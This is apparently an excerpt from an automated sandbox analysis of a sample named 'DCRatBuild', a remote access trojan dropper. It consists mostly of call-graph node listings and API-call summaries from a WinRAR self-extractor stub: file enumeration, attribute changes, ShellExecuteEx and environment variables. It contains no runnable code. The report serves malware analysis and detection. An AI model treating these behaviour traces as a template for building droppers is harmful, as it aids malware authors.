24400 8dc991 80 API calls 24411 8d893b _memcmp 24400->24411 24646 8d7d6c 24401->24646 24403->24329 24404 8d8a70 24405 8d8b43 24404->24405 24412 8d8abf 24404->24412 24409 8d8b9e 24405->24409 24422 8d8b4e 24405->24422 24406 8d8a69 24663 8d1f94 74 API calls 24406->24663 24419 8d8b30 24409->24419 24666 8d80ea 96 API calls 24409->24666 24410 8d8b9c 24415 8d9653 79 API calls 24410->24415 24411->24400 24411->24403 24411->24404 24411->24406 24661 8d8236 82 API calls 24411->24661 24662 8d1f94 74 API calls 24411->24662 24416 8da180 4 API calls 24412->24416 24412->24419 24414 8d9653 79 API calls 24414->24403 24415->24403 24417 8d8af7 24416->24417 24417->24419 24664 8d9377 96 API calls 24417->24664 24418 8d8c09 24421 8d9989 GetFileType 24418->24421 24431 8d8c74 24418->24431 24459 8d91c1 ___InternalCxxFrameHandler 24418->24459 24419->24410 24419->24418 24420 8daa88 8 API calls 24423 8d8cc3 24420->24423 24425 8d8c4c 24421->24425 24422->24410 24665 8d7f26 100 API calls ___InternalCxxFrameHandler 24422->24665 24427 8daa88 8 API calls 24423->24427 24425->24431 24667 8d1f94 74 API calls 24425->24667 24440 8d8cd9 24427->24440 24429 8d8c62 24668 8d7061 75 API calls 24429->24668 24431->24420 24432 8d8efd 24438 8d8f0f 24432->24438 24439 8d8f23 24432->24439 24455 8d8e27 24432->24455 24433 8d8df7 24435 8d8e69 24433->24435 24437 8d8e07 24433->24437 24434 8d8d9c 24434->24432 24434->24433 24436 8d826a CharUpperW 24435->24436 24441 8d8e84 24436->24441 24442 8d8e4d 24437->24442 24448 8d8e15 24437->24448 24443 8d92e6 121 API calls 24438->24443 24444 8e2c42 75 API calls 24439->24444 24440->24434 24669 8d9b21 SetFilePointer GetLastError SetEndOfFile 24440->24669 24450 8d8ead 24441->24450 24451 8d8eb4 24441->24451 24441->24455 24442->24455 24671 8d7907 108 API calls 24442->24671 24443->24455 24446 8d8f3c 24444->24446 24674 8e28f1 121 API calls 24446->24674 24670 8d1f94 74 API calls 24448->24670 24672 8d7698 84 API calls ___InternalCxxFrameHandler 24450->24672 24673 8d9224 94 API calls __EH_prolog 24451->24673 24457 8d904b 24455->24457 24675 8d1f94 74 API calls 24455->24675 24458 8d9156 24457->24458 24457->24459 24460 8d9104 24457->24460 24652 8d9ebf SetEndOfFile 24457->24652 24458->24459 24461 8da444 4 API calls 24458->24461 24459->24414 24653 8d9d62 24460->24653 24464 8d91b1 24461->24464 24464->24459 24676 8d1f94 74 API calls 24464->24676 24465 8d914b 24467 8d96d0 75 API calls 24465->24467 24467->24458 24469 8d1643 24468->24469 24691 8dc8ca 24469->24691 24472->24328 24473->24324 24474->24350 24480 8d16d2 24475->24480 24477 8d70b9 24477->24363 24478->24366 24479->24365 24481 8d16e8 24480->24481 24492 8d1740 __vswprintf_c_l 24480->24492 24482 8d1711 24481->24482 24493 8d6e91 74 API calls __vswprintf_c_l 24481->24493 24483 8d1767 24482->24483 24487 8d172d new 24482->24487 24486 8f35de 22 API calls 24483->24486 24485 8d1707 24494 8d6efd 75 API calls 24485->24494 24489 8d176e 24486->24489 24487->24492 24495 8d6efd 75 API calls 24487->24495 24489->24492 24496 8d6efd 75 API calls 24489->24496 24492->24477 24493->24485 24494->24482 24495->24492 24496->24492 24498 8e0c56 __vswprintf_c_l 24497->24498 24498->24370 24500 8d195d 24499->24500 24501 8d1961 24499->24501 24500->24373 24503 8d1896 24501->24503 24504 8d18a8 24503->24504 24505 8d18e5 24503->24505 24506 8d3aac 97 API calls 24504->24506 24511 8d3f18 24505->24511 24509 8d18c8 24506->24509 24509->24500 24515 8d3f21 24511->24515 24512 8d3aac 97 API calls 24512->24515 24513 8d1906 24513->24509 24516 8d1e00 24513->24516 24515->24512 24515->24513 24528 8e067c 24515->24528 24517 8d1e0a __EH_prolog 24516->24517 24536 8d3b3d 24517->24536 24519 8d1e34 24520 8d16d2 76 API calls 24519->24520 24522 8d1ebb 24519->24522 24521 8d1e4b 24520->24521 24564 8d1849 76 API calls 24521->24564 24522->24509 24524 8d1e63 24526 8d1e6f 24524->24526 24565 8e137a MultiByteToWideChar 24524->24565 24566 8d1849 76 API calls 24526->24566 24529 8e0683 24528->24529 24530 8e069e 24529->24530 24534 8d6e8c RaiseException CallUnexpected 24529->24534 24532 8e06af SetThreadExecutionState 24530->24532 24535 8d6e8c RaiseException CallUnexpected 24530->24535 24532->24515 24534->24530 24535->24532 24537 8d3b47 __EH_prolog 24536->24537 24538 8d3b5d 24537->24538 24539 8d3b79 24537->24539 24595 8d6dc1 74 API calls 24538->24595 24541 8d3dc2 24539->24541 24544 8d3ba5 24539->24544 24612 8d6dc1 74 API calls 24541->24612 24543 8d3b68 24543->24519 24544->24543 24567 8e2c42 24544->24567 24546 8d3c26 24547 8d3cb1 24546->24547 24563 8d3c1d 24546->24563 24598 8dc991 24546->24598 24580 8daa88 24547->24580 24548 8d3c22 24548->24546 24597 8d2034 76 API calls 24548->24597 24550 8d3bf4 24550->24546 24550->24548 24551 8d3c12 24550->24551 24596 8d6dc1 74 API calls 24551->24596 24554 8d3cc4 24557 8d3d3e 24554->24557 24558 8d3d48 24554->24558 24584 8d92e6 24557->24584 24604 8e28f1 121 API calls 24558->24604 24561 8d3d46 24561->24563 24605 8d1f94 74 API calls 24561->24605 24606 8e1acf 24563->24606 24564->24524 24565->24526 24566->24522 24568 8e2c51 24567->24568 24570 8e2c5b 24567->24570 24613 8d6efd 75 API calls 24568->24613 24571 8e2ca2 new 24570->24571 24573 8e2c9d Concurrency::cancel_current_task 24570->24573 24578 8e2cfd ___scrt_fastfail 24570->24578 24572 8e2da9 Concurrency::cancel_current_task 24571->24572 24574 8e2cd9 24571->24574 24571->24578 24616 8f157a RaiseException 24572->24616 24615 8f157a RaiseException 24573->24615 24614 8e2b7b 75 API calls 4 library calls 24574->24614 24578->24550 24579 8e2dc1 24581 8daa95 24580->24581 24583 8daa9f 24580->24583 24582 8ee24a new 8 API calls 24581->24582 24582->24583 24583->24554 24585 8d92f0 __EH_prolog 24584->24585 24617 8d7dc6 24585->24617 24588 8d709d 76 API calls 24589 8d9302 24588->24589 24620 8dca6c 24589->24620 24591 8d9314 24593 8dca6c 114 API calls 24591->24593 24594 8d935c 24591->24594 24629 8dcc51 97 API calls __vswprintf_c_l 24591->24629 24593->24591 24594->24561 24595->24543 24596->24563 24597->24546 24599 8dc9c4 24598->24599 24600 8dc9b2 24598->24600 24631 8d6249 80 API calls 24599->24631 24630 8d6249 80 API calls 24600->24630 24603 8dc9bc 24603->24547 24604->24561 24605->24563 24607 8e1ad9 24606->24607 24608 8e1af2 24607->24608 24611 8e1b06 24607->24611 24632 8e075b 84 API calls 24608->24632 24610 8e1af9 24610->24611 24612->24543 24613->24570 24614->24578 24615->24572 24616->24579 24618 8dacf5 GetVersionExW 24617->24618 24619 8d7dcb 24618->24619 24619->24588 24626 8dca82 __vswprintf_c_l 24620->24626 24621 8dcbf7 24622 8dcc1f 24621->24622 24623 8dca0b 6 API calls 24621->24623 24624 8e067c SetThreadExecutionState RaiseException 24622->24624 24623->24622 24627 8dcbee 24624->24627 24625 8e84bd 99 API calls 24625->24626 24626->24621 24626->24625 24626->24627 24628 8dab70 89 API calls 24626->24628 24627->24591 24628->24626 24629->24591 24630->24603 24631->24603 24632->24610 24633->24383 24634->24383 24635->24379 24637 8d5e4a 24636->24637 24677 8d5d67 24637->24677 24639 8d5eb5 24639->24395 24641 8d5e7d 24641->24639 24682 8dad65 CharUpperW CompareStringW 24641->24682 24643 8d8289 24642->24643 24688 8e179d CharUpperW 24643->24688 24645 8d8333 24645->24398 24647 8d7d7b 24646->24647 24648 8d7dbb 24647->24648 24689 8d7043 74 API calls 24647->24689 24648->24411 24650 8d7db3 24690 8d6dc1 74 API calls 24650->24690 24652->24460 24654 8d9d73 24653->24654 24656 8d9d82 24653->24656 24655 8d9d79 FlushFileBuffers 24654->24655 24654->24656 24655->24656 24657 8d9dfb SetFileTime 24656->24657 24657->24465 24658->24387 24659->24390 24660->24403 24661->24411 24662->24411 24663->24404 24664->24419 24665->24410 24666->24419 24667->24429 24668->24431 24669->24434 24670->24455 24671->24455 24672->24455 24673->24455 24674->24455 24675->24457 24676->24459 24683 8d5c64 24677->24683 24680 8d5c64 2 API calls 24681 8d5d88 24680->24681 24681->24641 24682->24641 24685 8d5c6e 24683->24685 24684 8d5d56 24684->24680 24684->24681 24685->24684 24687 8dad65 CharUpperW CompareStringW 24685->24687 24687->24685 24688->24645 24689->24650 24690->24648 24696 8dc8db 24691->24696 24693 8dc90d 24698 8da90e 84 API calls 24693->24698 24695 8dc918 24697 8da90e 84 API calls 24696->24697 24697->24693 24698->24695 24700 8da5fe 24699->24700 24701 8da691 FindNextFileW 24700->24701 24702 8da621 FindFirstFileW 24700->24702 24703 8da69c GetLastError 24701->24703 24704 8da6b0 24701->24704 24705 8da675 24702->24705 24706 8da638 24702->24706 24703->24704 24704->24705 24705->24337 24707 8db66c 2 API calls 24706->24707 24708 8da64d 24707->24708 24709 8da66a GetLastError 24708->24709 24710 8da651 FindFirstFileW 24708->24710 24709->24705 24710->24705 24710->24709 24711->24170 24712->24176 24713->24176 24714->24179 24715->24187 24717 8d9ef7 76 API calls 24716->24717 24718 8d1f5b 24717->24718 24719 8d19a6 97 API calls 24718->24719 24722 8d1f78 24718->24722 24720 8d1f68 24719->24720 24720->24722 24723 8d6dc1 74 API calls 24720->24723 24722->24195 24722->24196 24723->24722 24725 8eac8f GetMessageW 24724->24725 24726 8eacc8 GetDlgItem 24724->24726 24727 8eacb4 TranslateMessage DispatchMessageW 24725->24727 24728 8eaca5 IsDialogMessageW 24725->24728 24726->24206 24726->24207 24727->24726 24728->24726 24728->24727 24771 8eb8e0 93 API calls _swprintf 24772 8e8ce0 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 24776 9016e0 CloseHandle 24824 8fabfd 6 API calls CatchGuardHandler 24732 8ee1f9 24733 8ee203 24732->24733 24734 8edf59 ___delayLoadHelper2@8 19 API calls 24733->24734 24735 8ee210 24734->24735 24825 8eebf7 20 API calls 22874 8ec40e 22875 8ec4c7 22874->22875 22882 8ec42c _wcschr 22874->22882 22876 8ec4e5 22875->22876 22887 8ebe49 _wcsrchr 22875->22887 22929 8ece22 22875->22929 22879 8ece22 18 API calls 22876->22879 22876->22887 22879->22887 22880 8eca8d 22882->22875 22883 8e17ac CompareStringW 22882->22883 22883->22882 22884 8ec11d SetWindowTextW 22884->22887 22887->22880 22887->22884 22890 8ebf0b SetFileAttributesW 22887->22890 22895 8ec2e7 GetDlgItem SetWindowTextW SendMessageW 22887->22895 22898 8ec327 SendMessageW 22887->22898 22903 8e17ac CompareStringW 22887->22903 22904 8eaa36 22887->22904 22908 8e9da4 GetCurrentDirectoryW 22887->22908 22913 8da52a 7 API calls 22887->22913 22914 8da4b3 FindClose 22887->22914 22915 8eab9a 76 API calls new 22887->22915 22916 8f35de 22887->22916 22891 8ebfc5 GetFileAttributesW 22890->22891 22902 8ebf25 ___scrt_fastfail 22890->22902 22891->22887 22894 8ebfd7 DeleteFileW 22891->22894 22894->22887 22896 8ebfe8 22894->22896 22895->22887 22910 8d400a 22896->22910 22898->22887 22900 8ec01d MoveFileW 22900->22887 22901 8ec035 MoveFileExW 22900->22901 22901->22887 22902->22887 22902->22891 22909 8db4f7 52 API calls 2 library calls 22902->22909 22903->22887 22905 8eaa40 22904->22905 22906 8eaaf3 ExpandEnvironmentStringsW 22905->22906 22907 8eab16 22905->22907 22906->22907 22907->22887 22908->22887 22909->22902 22952 8d3fdd 22910->22952 22913->22887 22914->22887 22915->22887 22917 8f8606 22916->22917 22918 8f861e 22917->22918 22919 8f8613 22917->22919 22921 8f8626 22918->22921 22927 8f862f _abort 22918->22927 23032 8f8518 22919->23032 22922 8f84de _free 20 API calls 22921->22922 22925 8f861b 22922->22925 22923 8f8659 HeapReAlloc 22923->22925 22923->22927 22924 8f8634 23039 8f895a 20 API calls __dosmaperr 22924->23039 22925->22887 22927->22923 22927->22924 23040 8f71ad 7 API calls 2 library calls 22927->23040 22931 8ece2c ___scrt_fastfail 22929->22931 22930 8ed08a 22930->22876 22931->22930 22932 8ecf1b 22931->22932 23046 8e17ac CompareStringW 22931->23046 23043 8da180 22932->23043 22936 8ecf4f ShellExecuteExW 22936->22930 22942 8ecf62 22936->22942 22938 8ecf47 22938->22936 22939 8ecf9b 23048 8ed2e6 6 API calls 22939->23048 22940 8ecff1 CloseHandle 22941 8ecfff 22940->22941 22947 8ed00a 22940->22947 23049 8e17ac CompareStringW 22941->23049 22942->22939 22942->22940 22945 8ecf91 ShowWindow 22942->22945 22945->22939 22946 8ecfb3 22946->22940 22949 8ecfc6 GetExitCodeProcess 22946->22949 22947->22930 22948 8ed081 ShowWindow 22947->22948 22948->22930 22949->22940 22950 8ecfd9 22949->22950 22950->22940 22953 8d3ff4 ___scrt_initialize_default_local_stdio_options 22952->22953 22956 8f5759 22953->22956 22959 8f3837 22956->22959 22960 8f385f 22959->22960 22961 8f3877 22959->22961 22976 8f895a 20 API calls __dosmaperr 22960->22976 22961->22960 22962 8f387f 22961->22962 22978 8f3dd6 22962->22978 22965 8f3864 22977 8f8839 26 API calls _abort 22965->22977 22968 8f386f 22989 8eec4a 22968->22989 22971 8d3ffe GetFileAttributesW 22971->22896 22971->22900 22972 8f3907 22987 8f4186 51 API calls 4 library calls 22972->22987 22975 8f3912 22988 8f3e59 20 API calls _free 22975->22988 22976->22965 22977->22968 22979 8f3df3 22978->22979 22980 8f388f 22978->22980 22979->22980 22996 8f8fa5 GetLastError 22979->22996 22986 8f3da1 20 API calls 2 library calls 22980->22986 22982 8f3e14 23017 8f90fa 38 API calls __fassign 22982->23017 22984 8f3e2d 23018 8f9127 38 API calls __fassign 22984->23018 22986->22972 22987->22975 22988->22968 22990 8eec55 IsProcessorFeaturePresent 22989->22990 22991 8eec53 22989->22991 22993 8ef267 22990->22993 22991->22971 23031 8ef22b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 22993->23031 22995 8ef34a 22995->22971 22997 8f8fbb 22996->22997 22998 8f8fc7 22996->22998 23019 8fa61b 11 API calls 2 library calls 22997->23019 23020 8f85a9 20 API calls 3 library calls 22998->23020 23001 8f8fc1 23001->22998 23003 8f9010 SetLastError 23001->23003 23002 8f8fd3 23004 8f8fdb 23002->23004 23027 8fa671 11 API calls 2 library calls 23002->23027 23003->22982 23021 8f84de 23004->23021 23007 8f8ff0 23007->23004 23009 8f8ff7 23007->23009 23008 8f8fe1 23010 8f901c SetLastError 23008->23010 23028 8f8e16 20 API calls _abort 23009->23028 23029 8f8566 38 API calls _abort 23010->23029 23012 8f9002 23014 8f84de _free 20 API calls 23012->23014 23016 8f9009 23014->23016 23016->23003 23016->23010 23017->22984 23018->22980 23019->23001 23020->23002 23022 8f84e9 RtlFreeHeap 23021->23022 23023 8f8512 _free 23021->23023 23022->23023 23024 8f84fe 23022->23024 23023->23008 23030 8f895a 20 API calls __dosmaperr 23024->23030 23026 8f8504 GetLastError 23026->23023 23027->23007 23028->23012 23030->23026 23031->22995 23033 8f8556 23032->23033 23037 8f8526 _abort 23032->23037 23042 8f895a 20 API calls __dosmaperr 23033->23042 23035 8f8541 RtlAllocateHeap 23036 8f8554 23035->23036 23035->23037 23036->22925 23037->23033 23037->23035 23041 8f71ad 7 API calls 2 library calls 23037->23041 23039->22925 23040->22927 23041->23037 23042->23036 23050 8da194 23043->23050 23046->22932 23047 8db239 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 23047->22938 23048->22946 23049->22947 23058 8ee360 23050->23058 23053 8da189 23053->22936 23053->23047 23054 8da1b2 23060 8db66c 23054->23060 23056 8da1c6 23056->23053 23057 8da1ca GetFileAttributesW 23056->23057 23057->23053 23059 8da1a1 GetFileAttributesW 23058->23059 23059->23053 23059->23054 23061 8db679 23060->23061 23069 8db683 23061->23069 23070 8db806 CharUpperW 23061->23070 23063 8db692 23071 8db832 CharUpperW 23063->23071 23065 8db6a1 23066 8db71c GetCurrentDirectoryW 23065->23066 23067 8db6a5 23065->23067 23066->23069 23072 8db806 CharUpperW 23067->23072 23069->23056 23070->23063 23071->23065 23072->23069 24778 8eec0b 28 API calls 2 library calls 24828 8edb0b 19 API calls ___delayLoadHelper2@8 24829 8d1f05 126 API calls __EH_prolog 24779 8eea00 46 API calls 6 library calls 23078 8edb01 23079 8edaaa 23078->23079 23081 8edf59 23079->23081 23109 8edc67 23081->23109 23083 8edf73 23084 8edfd0 23083->23084 23096 8edff4 23083->23096 23085 8eded7 DloadReleaseSectionWriteAccess 11 API calls 23084->23085 23086 8edfdb RaiseException 23085->23086 23103 8ee1c9 23086->23103 23087 8ee0df 23093 8ee19b 23087->23093 23095 8ee13d GetProcAddress 23087->23095 23088 8eec4a CatchGuardHandler 5 API calls 23090 8ee1d8 23088->23090 23089 8ee06c LoadLibraryExA 23091 8ee07f GetLastError 23089->23091 23092 8ee0cd 23089->23092 23090->23079 23094 8ee0a8 23091->23094 23106 8ee092 23091->23106 23092->23087 23097 8ee0d8 FreeLibrary 23092->23097 23120 8eded7 23093->23120 23098 8eded7 DloadReleaseSectionWriteAccess 11 API calls 23094->23098 23095->23093 23099 8ee14d GetLastError 23095->23099 23096->23087 23096->23089 23096->23092 23096->23093 23097->23087 23100 8ee0b3 RaiseException 23098->23100 23101 8ee160 23099->23101 23100->23103 23101->23093 23104 8eded7 DloadReleaseSectionWriteAccess 11 API calls 23101->23104 23103->23088 23105 8ee181 RaiseException 23104->23105 23107 8edc67 ___delayLoadHelper2@8 11 API calls 23105->23107 23106->23092 23106->23094 23108 8ee198 23107->23108 23108->23093 23110 8edc99 23109->23110 23111 8edc73 23109->23111 23110->23083 23128 8edd15 23111->23128 23114 8edc94 23138 8edc9a 23114->23138 23117 8eec4a CatchGuardHandler 5 API calls 23118 8edf55 23117->23118 23118->23083 23119 8edf24 23119->23117 23121 8edf0b 23120->23121 23122 8edee9 23120->23122 23121->23103 23123 8edd15 DloadLock 8 API calls 23122->23123 23124 8edeee 23123->23124 23125 8edf06 23124->23125 23126 8ede67 DloadProtectSection 3 API calls 23124->23126 23147 8edf0f 8 API calls 2 library calls 23125->23147 23126->23125 23129 8edc9a DloadUnlock 3 API calls 23128->23129 23130 8edd2a 23129->23130 23131 8eec4a CatchGuardHandler 5 API calls 23130->23131 23132 8edc78 23131->23132 23132->23114 23133 8ede67 23132->23133 23134 8ede7c DloadObtainSection 23133->23134 23135 8ede82 23134->23135 23136 8edeb7 VirtualProtect 23134->23136 23146 8edd72 VirtualQuery GetSystemInfo 23134->23146 23135->23114 23136->23135 23139 8edcab 23138->23139 23140 8edca7 23138->23140 23141 8edcaf 23139->23141 23142 8edcb3 GetModuleHandleW 23139->23142 23140->23119 23141->23119 23143 8edcc9 GetProcAddress 23142->23143 23145 8edcc5 23142->23145 23144 8edcd9 GetProcAddress 23143->23144 23143->23145 23144->23145 23145->23119 23146->23136 23147->23121 24830 8ebe49 108 API calls 4 library calls 24832 8d6110 80 API calls 24833 8fb710 GetProcessHeap 23160 8d9f2f 23161 8d9f3d 23160->23161 23162 8d9f44 23160->23162 23163 8d9f4a GetStdHandle 23162->23163 23170 8d9f55 23162->23170 23163->23170 23164 8d9fa9 WriteFile 23164->23170 23165 8d9f7c WriteFile 23166 8d9f7a 23165->23166 23165->23170 23166->23165 23166->23170 23168 8da031 23172 8d7061 75 API calls 23168->23172 23170->23161 23170->23164 23170->23165 23170->23166 23170->23168 23171 8d6e18 60 API calls 23170->23171 23171->23170 23172->23161 24780 8d1025 29 API calls pre_c_initialization 24837 8f1522 RaiseException 24839 8ebe49 103 API calls 4 library calls 24781 8ea430 73 API calls 24842 8ed34e DialogBoxParamW 24783 8e8c40 GetClientRect 24784 8eec40 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24785 8f3040 5 API calls 2 library calls 24843 8ebe49 98 API calls 3 library calls 24786 900040 IsProcessorFeaturePresent 23237 8d9b59 23238 8d9bd7 23237->23238 23241 8d9b63 23237->23241 23239 8d9bad SetFilePointer 23239->23238 23240 8d9bcd GetLastError 23239->23240 23240->23238 23241->23239 24844 8e9b50 GdipDisposeImage GdipFree ___InternalCxxFrameHandler 24788 8f8050 8 API calls ___vcrt_uninitialize 24793 8efc60 51 API calls 2 library calls 24795 8f3460 RtlUnwind 24796 8f9c60 71 API calls _free 24797 8f9e60 31 API calls 2 library calls 24798 8d1075 82 API calls pre_c_initialization 24799 8e5c77 121 API calls __vswprintf_c_l 24740 8ed573 24741 8ed580 24740->24741 24742 8dddd1 53 API calls 24741->24742 24743 8ed594 24742->24743 24744 8d400a _swprintf 51 API calls 24743->24744 24745 8ed5a6 SetDlgItemTextW 24744->24745 24746 8eac74 5 API calls 24745->24746 24747 8ed5c3 24746->24747

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 008E00CF: GetModuleHandleW.KERNEL32(kernel32), ref: 008E00E4
                                    • Part of subcall function 008E00CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 008E00F6
                                    • Part of subcall function 008E00CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 008E0127
                                    • Part of subcall function 008E9DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 008E9DAC
                                    • Part of subcall function 008EA335: OleInitialize.OLE32(00000000), ref: 008EA34E
                                    • Part of subcall function 008EA335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 008EA385
                                    • Part of subcall function 008EA335: SHGetMalloc.SHELL32(00918430), ref: 008EA38F
                                    • Part of subcall function 008E13B3: GetCPInfo.KERNEL32(00000000,?), ref: 008E13C4
                                    • Part of subcall function 008E13B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 008E13D8
                                  • GetCommandLineW.KERNEL32 ref: 008ED61C
                                  • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 008ED643
                                  • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 008ED654
                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 008ED68E
                                    • Part of subcall function 008ED287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 008ED29D
                                    • Part of subcall function 008ED287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 008ED2D9
                                  • CloseHandle.KERNEL32(00000000), ref: 008ED697
                                  • GetModuleFileNameW.KERNEL32(00000000,0092DC90,00000800), ref: 008ED6B2
                                  • SetEnvironmentVariableW.KERNEL32(sfxname,0092DC90), ref: 008ED6BE
                                  • GetLocalTime.KERNEL32(?), ref: 008ED6C9
                                  • _swprintf.LIBCMT ref: 008ED708
                                  • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 008ED71A
                                  • GetModuleHandleW.KERNEL32(00000000), ref: 008ED721
                                  • LoadIconW.USER32(00000000,00000064), ref: 008ED738
                                  • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 008ED789
                                  • Sleep.KERNEL32(?), ref: 008ED7B7
                                  • DeleteObject.GDI32 ref: 008ED7F0
                                  • DeleteObject.GDI32(?), ref: 008ED800
                                  • CloseHandle.KERNEL32 ref: 008ED843
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                  • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\AppData\Local\Temp\RarSFX0$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                  • API String ID: 788466649-1049768110
                                  • Opcode ID: 60af7d5558b8ff3a5069f4b1391a4cf58e30be1cda6c979b258cc63a5ce5d2b9
                                  • Instruction ID: 3488fedda36996b2220825175ac0e33b3fa9d4470a030a34f9d0d6b50a898bbb
                                  • Opcode Fuzzy Hash: 60af7d5558b8ff3a5069f4b1391a4cf58e30be1cda6c979b258cc63a5ce5d2b9
                                  • Instruction Fuzzy Hash: 0061F871A1C391AFD320ABA69C49F6B37ACFB46704F004425F545D22A1DF749948EB62

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 971 8da5f4-8da61f call 8ee360 974 8da691-8da69a FindNextFileW 971->974 975 8da621-8da632 FindFirstFileW 971->975 976 8da69c-8da6aa GetLastError 974->976 977 8da6b0-8da6b2 974->977 978 8da6b8-8da75c call 8dfe56 call 8dbcfb call 8e0e19 * 3 975->978 979 8da638-8da64f call 8db66c 975->979 976->977 977->978 980 8da761-8da774 977->980 978->980 986 8da66a-8da673 GetLastError 979->986 987 8da651-8da668 FindFirstFileW 979->987 989 8da675-8da678 986->989 990 8da684 986->990 987->978 987->986 989->990 993 8da67a-8da67d 989->993 991 8da686-8da68c 990->991 991->980 993->990 994 8da67f-8da682 993->994 994->991
                                  APIs
                                  • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,008DA4EF,000000FF,?,?), ref: 008DA628
                                  • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,008DA4EF,000000FF,?,?), ref: 008DA65E
                                  • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,008DA4EF,000000FF,?,?), ref: 008DA66A
                                  • FindNextFileW.KERNEL32(?,?,?,?,?,?,008DA4EF,000000FF,?,?), ref: 008DA692
                                  • GetLastError.KERNEL32(?,?,?,?,008DA4EF,000000FF,?,?), ref: 008DA69E
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: FileFind$ErrorFirstLast$Next
                                  • String ID:
                                  • API String ID: 869497890-0
                                  • Opcode ID: 8c982593026d561fcdb39f9567d9b9f0777b3fa071dad0cf90cd1457307880fa
                                  • Instruction ID: b4b4998103254fcc4e30a64f234ceac965ebd81ae4734aefea651de86f199813
                                  • Opcode Fuzzy Hash: 8c982593026d561fcdb39f9567d9b9f0777b3fa071dad0cf90cd1457307880fa
                                  • Instruction Fuzzy Hash: 8D418E72508281EFC324EF38D884ADAF7E8FB58350F144A2AF5A9D3240D774E9548B92
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,?,008F7513,00000000,0090BAD8,0000000C,008F766A,00000000,00000002,00000000), ref: 008F755E
                                  • TerminateProcess.KERNEL32(00000000,?,008F7513,00000000,0090BAD8,0000000C,008F766A,00000000,00000002,00000000), ref: 008F7565
                                  • ExitProcess.KERNEL32 ref: 008F7577
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: Process$CurrentExitTerminate
                                  • String ID:
                                  • API String ID: 1703294689-0
                                  • Opcode ID: 389b01a642f63341d3d651b64db34690dc23cdff3b558cc91a7c5ba06c9d0b35
